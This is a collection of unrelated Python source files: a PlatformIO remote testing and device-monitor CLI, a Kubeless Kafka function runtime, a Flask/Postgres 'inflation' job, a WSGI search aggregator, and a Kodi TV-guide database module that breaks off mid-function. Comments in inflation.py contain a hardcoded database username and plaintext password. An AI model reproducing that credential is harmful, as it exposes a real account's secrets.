    ctx.invoke(
        cmd_run,
        environment=environment,
        target=local_targets,
        project_dir=project_dir,
        silent=silent,
        verbose=verbose,
    )

    wants_upload = any("upload" in t for t in target) or "program" in target
    if wants_upload:
        click.secho("Uploading firmware remotely", bold=True)
        # The firmware was just built locally, so tell the agent not to
        # rebuild or clean before uploading.
        client.options["target"] += ("nobuild",)
        client.options["disable_auto_clean"] = True
        client.connect()
    return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
    ctx,
    agents,
    environment,
    ignore,
    upload_port,
    test_port,
    project_dir,
    force_remote,
    without_building,
    without_uploading,
    verbose,
):
    """Run unit tests on a remote agent, building locally unless forced remote."""
    from platformio.commands.remote.client.run_or_test import RunOrTestClient

    client = RunOrTestClient(
        "test",
        agents,
        dict(
            environment=environment,
            ignore=ignore,
            upload_port=upload_port,
            test_port=test_port,
            project_dir=project_dir,
            force_remote=force_remote,
            without_building=without_building,
            without_uploading=without_uploading,
            verbose=verbose,
        ),
    )
    # Fully remote: the agent builds, uploads and runs the tests.
    if force_remote:
        return client.connect()

    # Hybrid mode: compile the tests locally, then execute them remotely.
    click.secho("Building project locally", bold=True)
    ctx.invoke(
        cmd_test,
        environment=environment,
        ignore=ignore,
        project_dir=project_dir,
        without_uploading=True,
        without_testing=True,
        verbose=verbose,
    )

    click.secho("Testing project remotely", bold=True)
    client.options["without_building"] = True
    client.connect()
    return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
    # Container group for `pio remote device ...` subcommands.
    pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
    """List the serial devices exposed by the selected agents."""
    from platformio.commands.remote.client.device_list import DeviceListClient

    client = DeviceListClient(agents, json_output)
    client.connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
    "--parity",
    default="N",
    type=click.Choice(["N", "E", "O", "S", "M"]),
    help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
    "--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
    "--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
    "--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
    "--encoding",
    default="UTF-8",
    help="Set the encoding for the serial port (e.g. hexlify, "
    "Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
    "--eol",
    default="CRLF",
    type=click.Choice(["CR", "LF", "CRLF"]),
    help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
    "--exit-char",
    type=int,
    default=3,
    help="ASCII code of special character that is used to exit "
    "the application, default=3 (Ctrl+C)",
)
@click.option(
    "--menu-char",
    type=int,
    default=20,
    help="ASCII code of special character that is used to "
    "control miniterm (menu), default=20 (DEC)",
)
@click.option(
    "--quiet",
    is_flag=True,
    help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
    "-e",
    "--environment",
    help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
    "--sock",
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.pass_obj
@click.pass_context
def device_monitor(ctx, agents, **kwargs):
    """Monitor a remote device.

    Called with --sock, it runs the remote client directly (this is the
    mode used by the helper subprocess below).  Called without --sock, it
    spawns that helper subprocess in a background thread, waits for the
    helper to write the tunneled port into <sock_dir>/sock, then attaches
    the local `device monitor` command to that port.
    """
    from platformio.commands.remote.client.device_monitor import DeviceMonitorClient

    if kwargs["sock"]:
        return DeviceMonitorClient(agents, **kwargs).connect()
    # Merge monitor options declared in the project's platformio.ini, if
    # the working directory is a PlatformIO project at all.
    project_options = {}
    try:
        with fs.cd(kwargs["project_dir"]):
            project_options = device_helpers.get_project_options(kwargs["environment"])
        kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
    except NotPlatformIOProjectError:
        pass
    kwargs["baud"] = kwargs["baud"] or 9600

    def _tx_target(sock_dir):
        # Runs in a background thread: re-invoke this very command with
        # --sock so the remote client writes the tunneled port into sock_dir.
        subcmd_argv = ["remote", "device", "monitor"]
        subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
        subcmd_argv.extend(["--sock", sock_dir])
        subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)

    sock_dir = mkdtemp(suffix="pio")
    sock_file = os.path.join(sock_dir, "sock")
    try:
        t = threading.Thread(target=_tx_target, args=(sock_dir,))
        t.start()
        # Poll until the helper publishes the port (or dies early).
        while t.is_alive() and not os.path.isfile(sock_file):
            sleep(0.1)
        if not t.is_alive():
            return
        with open(sock_file, encoding="utf8") as fp:
            kwargs["port"] = fp.read()
        ctx.invoke(cmd_device_monitor, **kwargs)
        t.join(2)
    finally:
        fs.rmtree(sock_dir)
    return True
|
kubeless.py | #!/usr/bin/env python
import sys
import traceback
import os
import imp
import json
from multiprocessing import Process, Queue
from kafka import KafkaConsumer
import prometheus_client as prom
# --- Runtime configuration, injected by the platform via environment ---
mod_name = os.getenv('MOD_NAME')            # module name of the user function
func_handler = os.getenv('FUNC_HANDLER')    # attribute name of the handler
topic_name = os.getenv('TOPIC_NAME')        # Kafka topic to consume
timeout = float(os.getenv('FUNC_TIMEOUT', 180))  # per-message timeout, seconds
# Consumer group id derived from module + handler.
# NOTE(review): this raises TypeError if MOD_NAME/FUNC_HANDLER are unset.
group = mod_name + func_handler
if "KUBELESS_KAFKA_SVC" in os.environ:
    kafka_svc = os.getenv('KUBELESS_KAFKA_SVC')
else:
    kafka_svc = 'kafka'
if "KUBELESS_KAFKA_NAMESPACE" in os.environ:
    kafka_namespace = os.getenv('KUBELESS_KAFKA_NAMESPACE')
else:
    kafka_namespace = 'kubeless'
kafka_server = '%s.%s:9092' % (kafka_svc, kafka_namespace)
# Load the user's function module from the mounted volume and resolve the
# handler callable.  NOTE(review): `imp` is deprecated in Python 3.
mod = imp.load_source('function', '/kubeless/%s.py' % mod_name)
func = getattr(mod, func_handler)
# Prometheus metrics, all labelled by topic.
func_hist = prom.Histogram('function_duration_seconds',
                           'Duration of user function in seconds',
                           ['topic'])
func_calls = prom.Counter('function_calls_total',
                          'Number of calls to user function',
                          ['topic'])
func_errors = prom.Counter('function_failures_total',
                           'Number of exceptions in user function',
                           ['topic'])
def funcWrap(result_queue, payload):
    """Child-process entry point: run the user handler, queue its result."""
    result_queue.put(func(payload))
def json_safe_loads(msg):
    """Deserialize a Kafka message value, tolerating non-JSON payloads.

    :param msg: raw message value (str/bytes)
    :return: {'type': 'json', 'payload': parsed} for valid JSON, otherwise
             {'type': 'text', 'payload': msg} with the value unchanged.
    """
    try:
        data = json.loads(msg)
        return {'type': 'json', 'payload': data}
    except (ValueError, TypeError):
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.  ValueError covers invalid JSON
        # (json.JSONDecodeError subclasses it); TypeError covers inputs
        # json.loads cannot accept at all.
        return {'type': 'text', 'payload': msg}
# Shared Kafka consumer; every message value is pre-deserialized with
# json_safe_loads, so handlers always receive {'type': ..., 'payload': ...}.
consumer = KafkaConsumer(
    bootstrap_servers=kafka_server,
    group_id=group, value_deserializer=json_safe_loads)
consumer.subscribe([topic_name])
def handle(msg):
    """Run the user function on one Kafka message, enforcing a timeout.

    The handler executes in a child process so a hung function can be
    terminated; the result travels back through a multiprocessing Queue.
    Raises Exception on timeout; failures are also counted in func_errors.
    """
    func_calls.labels(topic_name).inc()
    with func_errors.labels(topic_name).count_exceptions():
        with func_hist.labels(topic_name).time():
            q = Queue()
            p = Process(target=funcWrap, args=(q,msg.value['payload'],))
            p.start()
            p.join(timeout)
            # If the child process is still active after the timeout,
            # kill it and report the timeout.
            if p.is_alive():
                p.terminate()
                p.join()
                raise Exception('Timeout while processing the function')
            else:
                # NOTE(review): if the child exited without putting a result
                # (e.g. the user function raised), this q.get() blocks
                # forever — consider q.get(timeout=...) here.
                return q.get()
if __name__ == '__main__':
    # Expose Prometheus metrics and consume messages forever; a failing
    # handler is logged but never kills the consumer loop.
    prom.start_http_server(8080)
    while True:
        for msg in consumer:
            try:
                res = handle(msg)
                sys.stdout.write(str(res) + '\n')
                sys.stdout.flush()
            except Exception:
                traceback.print_exc()
|
inflation.py | from flask_restful import abort, reqparse, Resource
from marshmallow import Schema, fields, ValidationError, pre_load
from flask import Flask, Blueprint, request, jsonify
from flask_cors import CORS, cross_origin
import psycopg2
import os
from os.path import join, dirname
import threading
from time import sleep
import math
import urlparse
# DB_DRIVER=postgresql
# DB_HOST=localhost
# DB_USER=patientplatypus
# DB_PASSWORD=Fvnjty0b
# DB_NAME=pictureswapper
class Inflate:
    """Background 'inflation' job: periodically tops up the poorest users.

    NOTE(review): this module imports `urlparse`, so the file targets
    Python 2; keep that in mind before modernizing.
    """
    threads = []
    def __init__(self, s):
        self.s = s
    def printtest(self):
        # Smoke-test hook used to verify the class is wired up.
        print('insided the printtest for inflation')
    def inflatemethod(self):
        """Loop forever: give +1 money to users in the bottom 20% by wealth.

        Connects to Postgres via DATABASE_URL (Heroku-style URL), reads all
        rows from `logins`, and bumps the bottom of the wealth distribution.
        """
        while 1 > 0:
            # conn = psycopg2.connect(database = os.environ.get('DB_NAME'), user = os.environ.get('DB_USER'), password = os.environ.get('DB_PASSWORD'))
            # Translate DATABASE_URL into psycopg2 connection parameters.
            urlparse.uses_netloc.append("postgres")
            url = urlparse.urlparse(os.environ["DATABASE_URL"])
            conn = psycopg2.connect(
                database=url.path[1:],
                user=url.username,
                password=url.password,
                host=url.hostname,
                port=url.port
            )
            # conn = psycopg2.connect(database = 'pictureswapper', user = 'patientplatypus', password = 'Fvnjty0b')
            cur = conn.cursor()
            sql = 'SELECT * FROM logins'
            cur.execute(sql)
            conn.commit()
            userdata = cur.fetchall()
            userdataclean = userdata[0]
            print('this is the value of userdataclean ', userdataclean)
            print('this is the value of userdata ', userdata)
            usermoney = []
            totalmoney = 0
            # Rows appear to be (username, _, totalmoney, ...) — TODO confirm schema.
            for x in range(0,len(userdata)):
                userdict = {}
                userdict['name'] = userdata[x][0]
                userdict['money'] = userdata[x][2]
                usermoney.append(userdict)
            sortedusers = sorted(usermoney, key=lambda k: k['money'])
            print('sortedusers before adding: ', sortedusers)
            for x in range(0, len(sortedusers)):
                # Bottom 20% by rank AND strictly poorer than the user at the
                # 20th-percentile boundary get one unit of money.
                if 100 * x / len(sortedusers) <= 20 and sortedusers[x]['money']<sortedusers[int(math.ceil(0.2*len(sortedusers)))]['money']:
                    sortedusers[x]['money'] = sortedusers[x]['money'] + 1
            print('sortedusers after adding: ', sortedusers)
            # Persist the adjusted balances (parameterized UPDATE per user).
            for x in range(0, len(sortedusers)):
                sql = 'UPDATE logins SET totalmoney = %s WHERE username = %s'
                params = (sortedusers[x]['money'], sortedusers[x]['name'],)
                cur.execute(sql, params)
                conn.commit()
            conn.close()
            # NOTE(review): sleep(300000) is ~3.5 days in seconds — confirm
            # whether milliseconds (5 minutes) were intended.
            sleep(300000)
    def timermethod(self):
        """Launch inflatemethod on a background thread."""
        # NOTE(review): `h` is unused.
        h="hello there "
        t = threading.Thread(target=self.inflatemethod, args=())
        t.start()
# totalmoney = totalmoney + userdata[x][2]
# for x in range(0, len(usermoney)):
# usermoney[x]['percentage'] = 100 * usermoney[x]['money'] / totalmoney
# print('***** values after first look *****')
# print('usermoney ', usermoney)
# print('totalmoney ', totalmoney)
#
# for x in range(0, len(usermoney)):
# if usermoney[x]['percentage'] <= 20:
# sql = 'UPDATE logins SET totalmoney = %s WHERE username = %s'
# newtotalmoney = usermoney[x]['money']+10
# params = (newtotalmoney, usermoney[x]['name'],)
# cur.execute(sql, params)
# conn.commit()
#
# sleep(5)
#
# sql = 'SELECT * FROM logins'
# cur.execute(sql)
# conn.commit()
# userdatanew = cur.fetchall()
# usermoneynew = []
# totalmoneynew = 0
# for x in range(0,len(userdatanew)):
# userdict = {}
# userdict['name'] = userdatanew[x][0]
# userdict['money'] = userdatanew[x][2]
# usermoneynew.append(userdict)
# totalmoneynew = totalmoneynew + userdatanew[x][2]
# for x in range(0, len(usermoneynew)):
# usermoneynew[x]['percentage'] = 100 * usermoneynew[x]['money'] / totalmoney
#
#
# print('***** values after add money *****')
# print('usermoneynew ', usermoneynew)
# print('totalmoneynew ', totalmoneynew)
#
# print('***** the total number of users *****')
# print('total number of users: ', len(userdata))
#
# conn.close()
#
# alist = [54,26,93,17,77,31,44,55,20]
# bubbleSort(alist)
# print(alist)
#
# class Inflate:
# # def __init__(self, profitorloss, listname, itemname, itemdescription):
# # self.profitorloss = profitorloss
# # self.listname = listname
# # self.itemname = itemname
# # self.itemdescription = itemdescription
# threads = []
# def __init__(self, s):
# self.s = s
# def printtest(self):
# print('insided the printtest for inflation')
# def hello(self, h):
# print h + self.s
# def timermethod(self):
# h="hello there "
# for i in range(5):
# t = threading.Thread(target=self.hello, args=(h,))
# t.start()
# sleep(2)
# while 1>0:
# t = threading.Timer(2, self.hello, [h])
# t.start()
# sleep(2)
# time.sleep(2)
# print "Hi"
# i=10
# i=i+20
# print i
# class Typewriter(threading.Thread):
# def __init__(self, your_string):
# threading.Thread.__init__(self)
# self.my_string = your_string
#
# def run(self):
# for char in self.my_string:
# libtcod.console_print(0,3,3,char)
# time.sleep(50)
# import threading
#
# def worker():
# """thread worker function"""
# print 'Worker'
# return
#
# threads = []
# for i in range(5):
# t = threading.Thread(target=worker)
# threads.append(t)
# t.start()
#!/usr/bin/python
#
# import threading
# import time
#
# exitFlag = 0
#
# class myThread (threading.Thread):
# def __init__(self, threadID, name, counter):
# threading.Thread.__init__(self)
# self.threadID = threadID
# self.name = name
# self.counter = counter
# def run(self):
# print "Starting " + self.name
# print_time(self.name, self.counter, 5)
# print "Exiting " + self.name
#
# def print_time(threadName, counter, delay):
# while counter:
# if exitFlag:
# threadName.exit()
# time.sleep(delay)
# print "%s: %s" % (threadName, time.ctime(time.time()))
# counter -= 1
#
# # Create new threads
# thread1 = myThread(1, "Thread-1", 1)
# thread2 = myThread(2, "Thread-2", 2)
#
# # Start new Threads
# thread1.start()
# thread2.start()
#
# print "Exiting Main Thread"
# class Dog:
#
# def __init__(self, name):
# self.name = name
# self.tricks = [] # creates a new empty list for each dog
#
# def add_trick(self, trick):
# self.tricks.append(trick)
|
index.wsgi | # -*- coding: UTF-8 -*-
import sae,sys
reload(sys)
sys.setdefaultencoding('utf8')
import urllib,urllib2,cookielib
import HTMLParser,json
#from multiprocessing.pool import Pool
import threading,time
from greenlet import greenlet
import getSearchResult as gsr
import publicParams as P
import reHTMLTags as rH
def app(environ, start_response):
    """WSGI entry point: fan search requests out to every configured search
    URL and return the merged results as JSON sorted by weight (descending).

    Fixes over the original: the fetcher threads are joined before reading
    P.list_data (it was read while threads were still filling it -- a race
    that returned partial results), and the JSON body is wrapped in a list
    so WSGI does not iterate the string character by character.
    """
    key = environ['QUERY_STRING']
    # Only the first query-string component is the search key.
    if key.count("&"):
        key = key.split("&")[0]
    if key:
        P.key = urllib.unquote(key)
        workers = []
        for surl in P.searchURLarr:
            t = threading.Thread(target=getURL, args=(surl, key))
            t.start()
            workers.append(t)
        # Wait for every fetcher so P.list_data is complete before use.
        for t in workers:
            t.join()
        jsarr = json.loads(json.dumps(P.list_data, indent=2))
        jsarr.sort(key=lambda x: x["weight"], reverse=True)
        response_body = [json.dumps(jsarr, indent=2)]
    else:
        response_body = []
    status = '200 OK'
    response_headers = [
        ('Content-Type', 'application/json'),
        ('Access-Control-Allow-Origin', '*')
    ]
    start_response(status, response_headers)
    return response_body
application = sae.create_wsgi_app(app)
def getURL(surl, key):
    # Fetch one search URL (base endpoint + query key) and hand the HTML
    # to the link extractor on a greenlet.
    full_url = surl + key
    # scheme://host prefix: the first three '/'-separated pieces rejoined,
    # e.g. "http://example.com/search?q=x" -> "http://example.com".
    parts = full_url.split('/')
    base = parts[0] + '/' + parts[1] + '/' + parts[2]
    page = gethtml(full_url)
    greenlet(getlinks).switch(page, base)
def getlinks(html_code, addr):
    # Run the fetched page through the search-result extractor for *addr*.
    parser = gsr.getSearchResult(addr)
    parser.feed(html_code)
    parser.close()
def gethtml(url):
    """Fetch *url* with cookie support and return the page body.

    Returns an empty string when the request fails: the original left
    `content` unbound after swallowing URLError, so the final `return`
    raised NameError instead of degrading gracefully.
    """
    content = ''
    cookie = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
    req = urllib2.Request(url)
    try:
        content = opener.open(req).read()  # page body
    except urllib2.URLError:
        pass  # best-effort fetch: fall through with empty content
    return content
|
source.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Tommy Winther
# http://tommy.winther.nu
#
# Modified for FTV Guide (09/2014 onwards)
# by Thomas Geppert [bluezed] - bluezed.apps@gmail.com
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this Program; see the file LICENSE.txt. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import os
import threading
import datetime
import time
from xml.etree import ElementTree
from strings import *
from guideTypes import *
from fileFetcher import *
import xbmc
import xbmcgui
import xbmcvfs
import sqlite3
SETTINGS_TO_CHECK = ['source', 'xmltv.type', 'xmltv.file', 'xmltv.url', 'xmltv.logo.folder']
class Channel(object):
    """A single TV channel as shown in the guide.

    Identity is the `id` alone: two Channel objects with the same id compare
    equal regardless of title/logo/stream.
    """

    def __init__(self, id, title, logo=None, streamUrl=None, visible=True, weight=-1):
        self.id = id
        self.title = title
        self.logo = logo
        self.streamUrl = streamUrl
        self.visible = visible
        self.weight = weight  # -1 means "no explicit ordering assigned yet"

    def isPlayable(self):
        # Playable only when a non-empty stream URL is present.
        return hasattr(self, 'streamUrl') and self.streamUrl

    def __eq__(self, other):
        # Compare by id only; defer on foreign types (the original raised
        # AttributeError when compared against a non-Channel operand).
        if not isinstance(other, Channel):
            return NotImplemented
        return self.id == other.id

    def __ne__(self, other):
        # Python 2 does not derive != from ==; without this, `a != b`
        # silently fell back to identity comparison.
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def __hash__(self):
        # Keep hashing consistent with equality-by-id.
        return hash(self.id)

    def __repr__(self):
        return 'Channel(id=%s, title=%s, logo=%s, streamUrl=%s)' \
               % (self.id, self.title, self.logo, self.streamUrl)
class Program(object):
    """One guide entry: a titled time slot on a channel.

    @param channel: owning channel
    @type channel: source.Channel
    @param title: program title
    @param startDate: slot start
    @param endDate: slot end
    @param description: synopsis text
    @param imageLarge: optional large artwork
    @param imageSmall: optional small artwork
    @param notificationScheduled: truthy when a reminder exists for it
    """

    def __init__(self, channel, title, startDate, endDate, description, imageLarge=None, imageSmall=None,
                 notificationScheduled=None):
        (self.channel, self.title, self.startDate, self.endDate,
         self.description, self.imageLarge, self.imageSmall,
         self.notificationScheduled) = (channel, title, startDate, endDate,
                                        description, imageLarge, imageSmall,
                                        notificationScheduled)

    def __repr__(self):
        template = ('Program(channel=%s, title=%s, startDate=%s, endDate=%s, '
                    'description=%s, imageLarge=%s, imageSmall=%s)')
        return template % (self.channel, self.title, self.startDate, self.endDate,
                           self.description, self.imageLarge, self.imageSmall)
class SourceException(Exception):
    """Base error for guide-source failures."""
    pass
class SourceUpdateCanceledException(SourceException):
    """Raised when an in-progress source update is canceled by the caller."""
    pass
class SourceNotConfiguredException(SourceException):
    """Raised when no usable guide file/URL is configured for the source."""
    pass
class DatabaseSchemaException(sqlite3.DatabaseError):
    """Raised when the sqlite schema cannot be created or upgraded."""
    pass
class Database(object):
    """Thread-confined sqlite facade for the guide data.

    All sqlite access runs on a single 'Database Event Loop' thread; public
    methods enqueue (method, callback, *args) events and either return
    immediately or poll until the worker publishes a result keyed by the
    method's name.

    Fixes over the original:
    - `date=datetime.datetime.now()` def-time defaults (frozen at import
      time in long-running sessions) replaced by per-call defaults;
    - `_getProgramList` binds channel ids as SQL parameters instead of
      splicing them into the statement, and closes its cursor;
    - swallowed event-loop exceptions now log a traceback;
    - Python-2-only `except X, e` syntax modernized to `except X as e`.
    """
    SOURCE_DB = 'source.db'
    CHANNELS_PER_PAGE = 8

    def __init__(self):
        self.conn = None
        self.eventQueue = list()
        self.event = threading.Event()
        self.eventResults = dict()
        self.source = instantiateSource()
        self.updateInProgress = False
        self.updateFailed = False
        self.settingsChanged = None
        self.alreadyTriedUnlinking = False
        self.channelList = list()
        profilePath = xbmc.translatePath(ADDON.getAddonInfo('profile'))
        if not os.path.exists(profilePath):
            os.makedirs(profilePath)
        self.databasePath = os.path.join(profilePath, Database.SOURCE_DB)
        threading.Thread(name='Database Event Loop', target=self.eventLoop).start()

    def eventLoop(self):
        """Worker loop: pop queued commands, run them, publish results."""
        print('Database.eventLoop() >>>>>>>>>> starting...')
        while True:
            self.event.wait()
            self.event.clear()
            event = self.eventQueue.pop(0)
            command = event[0]
            callback = event[1]
            print('Database.eventLoop() >>>>>>>>>> processing command: ' + command.__name__)
            try:
                result = command(*event[2:])
                self.eventResults[command.__name__] = result
                if callback:
                    if self._initialize == command:
                        # _initialize's callback receives the success flag.
                        threading.Thread(name='Database callback', target=callback, args=[result]).start()
                    else:
                        threading.Thread(name='Database callback', target=callback).start()
                if self._close == command:
                    del self.eventQueue[:]
                    break
            except Exception:
                # Log the failure instead of silently swallowing it.
                import traceback
                print('Database.eventLoop() >>>>>>>>>> exception!')
                traceback.print_exc()
        print('Database.eventLoop() >>>>>>>>>> exiting...')

    def _invokeAndBlockForResult(self, method, *args):
        # Queue the call on the worker thread, then poll until it publishes
        # a result under the method's name.
        event = [method, None]
        event.extend(args)
        self.eventQueue.append(event)
        self.event.set()
        while method.__name__ not in self.eventResults:
            time.sleep(0.1)
        result = self.eventResults.get(method.__name__)
        del self.eventResults[method.__name__]
        return result

    def initialize(self, callback, cancel_requested_callback=None):
        self.eventQueue.append([self._initialize, callback, cancel_requested_callback])
        self.event.set()

    def _initialize(self, cancel_requested_callback):
        """Open (recreating if broken) the sqlite DB; return True on success."""
        sqlite3.register_adapter(datetime.datetime, self.adapt_datetime)
        sqlite3.register_converter('timestamp', self.convert_datetime)
        self.alreadyTriedUnlinking = False
        while True:
            if cancel_requested_callback is not None and cancel_requested_callback():
                break
            try:
                self.conn = sqlite3.connect(self.databasePath, detect_types=sqlite3.PARSE_DECLTYPES)
                self.conn.execute('PRAGMA foreign_keys = ON')
                self.conn.row_factory = sqlite3.Row
                # create and drop dummy table to check if database is locked
                c = self.conn.cursor()
                c.execute('CREATE TABLE IF NOT EXISTS database_lock_check(id TEXT PRIMARY KEY)')
                c.execute('DROP TABLE database_lock_check')
                c.close()
                self._createTables()
                self.settingsChanged = self._wasSettingsChanged(ADDON)
                break
            except sqlite3.OperationalError:
                if cancel_requested_callback is None:
                    xbmc.log('[script.ftvguide] Database is locked, bailing out...', xbmc.LOGDEBUG)
                    break
                else:  # ignore 'database is locked'
                    xbmc.log('[script.ftvguide] Database is locked, retrying...', xbmc.LOGDEBUG)
            except sqlite3.DatabaseError:
                # Broken database file: unlink once and retry from scratch.
                self.conn = None
                if self.alreadyTriedUnlinking:
                    xbmc.log('[script.ftvguide] Database is broken and unlink() failed', xbmc.LOGDEBUG)
                    break
                else:
                    try:
                        os.unlink(self.databasePath)
                    except OSError:
                        pass
                    self.alreadyTriedUnlinking = True
                    xbmcgui.Dialog().ok(ADDON.getAddonInfo('name'), strings(DATABASE_SCHEMA_ERROR_1),
                                        strings(DATABASE_SCHEMA_ERROR_2), strings(DATABASE_SCHEMA_ERROR_3))
        return self.conn is not None

    def close(self, callback=None):
        self.eventQueue.append([self._close, callback])
        self.event.set()

    def _close(self):
        try:
            # rollback any non-commit'ed changes to avoid database lock
            if self.conn:
                self.conn.rollback()
        except sqlite3.OperationalError:
            pass  # no transaction is active
        if self.conn:
            self.conn.close()

    def _wasSettingsChanged(self, addon):
        """Return True when any watched addon setting differs from the DB copy."""
        settingsChanged = False
        noRows = True
        count = 0
        c = self.conn.cursor()
        c.execute('SELECT * FROM settings')
        for row in c:
            noRows = False
            key = row['key']
            if SETTINGS_TO_CHECK.count(key):
                count += 1
                if row['value'] != addon.getSetting(key):
                    settingsChanged = True
        if count != len(SETTINGS_TO_CHECK):
            settingsChanged = True
        if settingsChanged or noRows:
            # Persist the current settings snapshot for the next comparison.
            for key in SETTINGS_TO_CHECK:
                value = addon.getSetting(key).decode('utf-8', 'ignore')
                c.execute('INSERT OR IGNORE INTO settings(key, value) VALUES (?, ?)', [key, value])
                if not c.rowcount:
                    c.execute('UPDATE settings SET value=? WHERE key=?', [value, key])
            self.conn.commit()
        c.close()
        print('Settings changed: ' + str(settingsChanged))
        return settingsChanged

    def _isCacheExpired(self, date):
        """Return True when channel or program data for *date* needs refreshing."""
        if self.settingsChanged:
            return True
        # check if channel data is up-to-date in database
        try:
            c = self.conn.cursor()
            c.execute('SELECT channels_updated FROM sources WHERE id=?', [self.source.KEY])
            row = c.fetchone()
            if not row:
                return True
            channelsLastUpdated = row['channels_updated']
            c.close()
        except TypeError:
            return True
        # check if program data is up-to-date in database
        dateStr = date.strftime('%Y-%m-%d')
        c = self.conn.cursor()
        c.execute('SELECT programs_updated FROM updates WHERE source=? AND date=?', [self.source.KEY, dateStr])
        row = c.fetchone()
        if row:
            programsLastUpdated = row['programs_updated']
        else:
            programsLastUpdated = datetime.datetime.fromtimestamp(0)
        c.close()
        return self.source.isUpdated(channelsLastUpdated, programsLastUpdated)

    def updateChannelAndProgramListCaches(self, callback, date=None, progress_callback=None,
                                          clearExistingProgramList=True):
        # Per-call default: the original `date=datetime.datetime.now()` was
        # evaluated once at import time and went stale in long sessions.
        if date is None:
            date = datetime.datetime.now()
        self.eventQueue.append(
            [self._updateChannelAndProgramListCaches, callback, date, progress_callback, clearExistingProgramList])
        self.event.set()

    def _updateChannelAndProgramListCaches(self, date, progress_callback, clearExistingProgramList):
        """Refresh channel/program caches from the source if they expired."""
        # todo workaround service.py 'forgets' the adapter and convert set in _initialize.. wtf?!
        sqlite3.register_adapter(datetime.datetime, self.adapt_datetime)
        sqlite3.register_converter('timestamp', self.convert_datetime)
        if not self._isCacheExpired(date) and not self.source.needReset:
            return
        else:
            # if the xmltv data needs to be loaded the database
            # should be reset to avoid ghosting!
            self.updateInProgress = True
            c = self.conn.cursor()
            c.execute("DELETE FROM updates")
            c.execute("UPDATE sources SET channels_updated=0")
            self.conn.commit()
            c.close()
            self.source.needReset = False
        self.updateInProgress = True
        self.updateFailed = False
        dateStr = date.strftime('%Y-%m-%d')
        c = self.conn.cursor()
        try:
            xbmc.log('[script.ftvguide] Updating caches...', xbmc.LOGDEBUG)
            if progress_callback:
                progress_callback(0)
            if self.settingsChanged:
                c.execute('DELETE FROM channels WHERE source=?', [self.source.KEY])
                c.execute('DELETE FROM programs WHERE source=?', [self.source.KEY])
                c.execute("DELETE FROM updates WHERE source=?", [self.source.KEY])
                self.settingsChanged = False  # only want to update once due to changed settings
            if clearExistingProgramList:
                c.execute("DELETE FROM updates WHERE source=?",
                          [self.source.KEY])  # cascades and deletes associated programs records
            else:
                c.execute("DELETE FROM updates WHERE source=? AND date=?",
                          [self.source.KEY, dateStr])  # cascades and deletes associated programs records
            # programs updated
            c.execute("INSERT INTO updates(source, date, programs_updated) VALUES(?, ?, ?)",
                      [self.source.KEY, dateStr, datetime.datetime.now()])
            updatesId = c.lastrowid
            imported = imported_channels = imported_programs = 0
            for item in self.source.getDataFromExternal(date, progress_callback):
                imported += 1
                if imported % 10000 == 0:
                    # Commit in batches to bound transaction size.
                    self.conn.commit()
                if isinstance(item, Channel):
                    imported_channels += 1
                    channel = item
                    c.execute(
                        'INSERT OR IGNORE INTO channels(id, title, logo, stream_url, visible, weight, source) VALUES(?, ?, ?, ?, ?, (CASE ? WHEN -1 THEN (SELECT COALESCE(MAX(weight)+1, 0) FROM channels WHERE source=?) ELSE ? END), ?)',
                        [channel.id, channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight,
                         self.source.KEY, channel.weight, self.source.KEY])
                    if not c.rowcount:
                        c.execute(
                            'UPDATE channels SET title=?, logo=?, stream_url=?, visible=(CASE ? WHEN -1 THEN visible ELSE ? END), weight=(CASE ? WHEN -1 THEN weight ELSE ? END) WHERE id=? AND source=?',
                            [channel.title, channel.logo, channel.streamUrl, channel.weight, channel.visible,
                             channel.weight, channel.weight, channel.id, self.source.KEY])
                elif isinstance(item, Program):
